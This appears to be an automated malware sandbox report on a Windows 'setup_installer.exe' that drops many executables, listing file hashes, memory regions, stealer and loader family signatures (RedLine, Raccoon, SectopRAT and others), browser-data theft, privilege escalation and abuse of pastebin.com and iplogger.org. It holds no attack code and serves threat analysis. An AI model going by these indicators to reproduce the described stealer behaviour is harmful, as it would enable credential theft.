MD5 e99d5f78660e8ea9d09045c7f1cba42c
SHA1 43ab1072c97572f4e8caefdcbe2d5aa211fd3087
SHA256 3ab51aa79dc557f84729de1001f2ade7bd3900a3a953045de76124aa5e989b98
SHA512 01fc6d11d6a70b352a89f27357323fd3c4b5d93bf3e6a5ee57ba0fa497b2c2665dd33dd0791a85db718debfc88b0b5a44c123964d2460f73e5caf8128b79b831

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Y2Yadq.8~

MD5 6acc22b9c1abe535c6feac6a79db1a18
SHA1 eb94c578b2e6c1bae8a75027f08dcf513e8fb1b9
SHA256 e3870b1f5a9c3be9041d873253e6b0bd89c3fcf05a1a8469ac0e900bc49976ef
SHA512 f99cdc1ff6bb82f73de85144b5be359b661f4bb820f3763d80314357fb7eb5fba812a0d055242e84f14381c4db4caa8fea461782e406e60685082cb8d8e06adf

memory/2112-261-0x0000000003060000-0x00000000031BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_ENU.W

MD5 13d4be61d9d3c7da927d482b449ff09e
SHA1 57fab8c699c46ff55b74794027201210c001dd0b
SHA256 848085bcebccf4cb84fc3b87fe2d6e38b0d518713146bda312570b82148fa324
SHA512 ac59a4ff77d1d6059af0d20cc91ba9290c9f3116036dcca76bc2a8842137d1db5b5a4a988d7bd269b7072b1f136f5448e51f28bab8f105bcf9234cd471e0b378

C:\Users\Admin\AppData\Local\Temp\RarSFX1\lNOSCc5X.Dt

MD5 36fb32e67fa42636817aca7805b49800
SHA1 ae6bdd4bafe6b4a8efeb0f98ac82d1ed4ef07164
SHA256 b040b87c723d23d79034a35fdc82c1f3de3052b489bb7b63e5a505afc5cb3e56
SHA512 56ff53ce8c397867a0ad2f699d3e4441ef0695685636f702db93cb62ffc1c75d33559a92a9286c9f875f2ab2f77034579cc578da427c275c95503edaf78fc42e

C:\Users\Admin\AppData\Local\Temp\RarSFX1\490lw~.x

MD5 6ba17599a0544b52b5ea5ae9d261658f
SHA1 73637edb407d1a8cb80836b19602611cc71dcdf7
SHA256 2cfefd85953f6aab43cd102651b0a130dbefe37790fa4ca775539c497aa52168
SHA512 5a0424546eb2609128812759fc0d49491562ffdc318597d9b6ef80544fd5d9e70083c91f0313e0bb6c934c5c3201a7a4f6f662b049c543ffe3765d8c665f91c2

C:\Users\Admin\AppData\Local\Temp\RarSFX1\B0zcq1x.o

MD5 a6b49368224db5ac48fea0e7215b39d9
SHA1 7385c9cae70f58842c8337ddb038641515e71313
SHA256 fe29f2f6d0ea68365d1e4cf8dab5d6fbf3ea1683964bc1027299069251052262
SHA512 7354e6ba9e478cb40d5efbc392cc911c05b9065bb01c05dfbafaf0ac0a609a07df14b4eb7ff4f18d11022d4c767e7c356a1f9510a249b399fe6b88ed82976e03

C:\Users\Admin\AppData\Local\Temp\RarSFX1\PUVMYbL.81

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

memory/3664-248-0x0000000073710000-0x0000000073EC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fe147adf3e5ed555b843fff0fa29ab8a
SHA1 1cdf42b7f835e19466b52b981e6677804895b99b
SHA256 8cd6fb1b1716316a8a0b3312e3e997eddfb0d15b2b71b57ca88ba26e95b9ce88
SHA512 d17a0ab8abdaf1f22a0e16114f621473d9a46734cc01d13778b9ba7df2bf620ddffacef2ee3f1cdfc9c9a63558937248dacd03e42acffab9f53f7064022a04f7

memory/3664-241-0x0000000007DE0000-0x0000000007DE8000-memory.dmp

memory/4180-220-0x0000000005B00000-0x0000000006118000-memory.dmp

memory/3664-219-0x0000000007B40000-0x0000000007B4A000-memory.dmp

memory/4180-215-0x0000000000400000-0x0000000000422000-memory.dmp

memory/840-213-0x0000000008100000-0x000000000877A000-memory.dmp

memory/840-200-0x000000006D130000-0x000000006D17C000-memory.dmp

memory/3664-199-0x00000000076F0000-0x000000000770E000-memory.dmp

memory/3664-189-0x000000006D130000-0x000000006D17C000-memory.dmp

memory/2112-262-0x00000000035C0000-0x0000000003666000-memory.dmp

memory/2112-264-0x0000000003670000-0x0000000003703000-memory.dmp

memory/2112-266-0x0000000003670000-0x0000000003703000-memory.dmp

memory/2112-263-0x0000000003670000-0x0000000003703000-memory.dmp

memory/3196-269-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1528-272-0x0000000000400000-0x0000000000422000-memory.dmp

memory/184-274-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/3256-273-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2112-275-0x0000000003060000-0x00000000031BD000-memory.dmp

memory/2112-284-0x0000000003670000-0x0000000003703000-memory.dmp

memory/2112-285-0x0000000003710000-0x00000000044BC000-memory.dmp

memory/2112-286-0x00000000044C0000-0x000000000454C000-memory.dmp

memory/2112-290-0x0000000004550000-0x00000000045D8000-memory.dmp

memory/2112-287-0x0000000004550000-0x00000000045D8000-memory.dmp

memory/2112-291-0x0000000001020000-0x0000000001021000-memory.dmp

memory/2112-292-0x0000000001030000-0x0000000001034000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240708-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description Indicator Process Target
N/A N/A N/A N/A

Raccoon family

raccoon

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1993b3f72c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19325eb008c0b950.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19150ee2be694c8a4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19411ac950924ec3f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c1338f41ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1969586bcbf58493.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c06f159e0ec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c78ded4d176ac.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue192762f1cd058ddf8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue192762f1cd058ddf8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-67S6C.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1993b3f72c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1993b3f72c.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19325eb008c0b950.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19325eb008c0b950.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1969586bcbf58493.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c1338f41ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19150ee2be694c8a4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c1338f41ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19150ee2be694c8a4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1969586bcbf58493.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19411ac950924ec3f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19411ac950924ec3f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c06f159e0ec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c06f159e0ec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-67S6C.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-67S6C.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-67S6C.tmp\Tue19879c4c0e.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-67S6C.tmp\Tue19879c4c0e.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1993b3f72c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19150ee2be694c8a4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19325eb008c0b950.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c1338f41ab.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1969586bcbf58493.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c06f159e0ec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19411ac950924ec3f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19150ee2be694c8a4.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
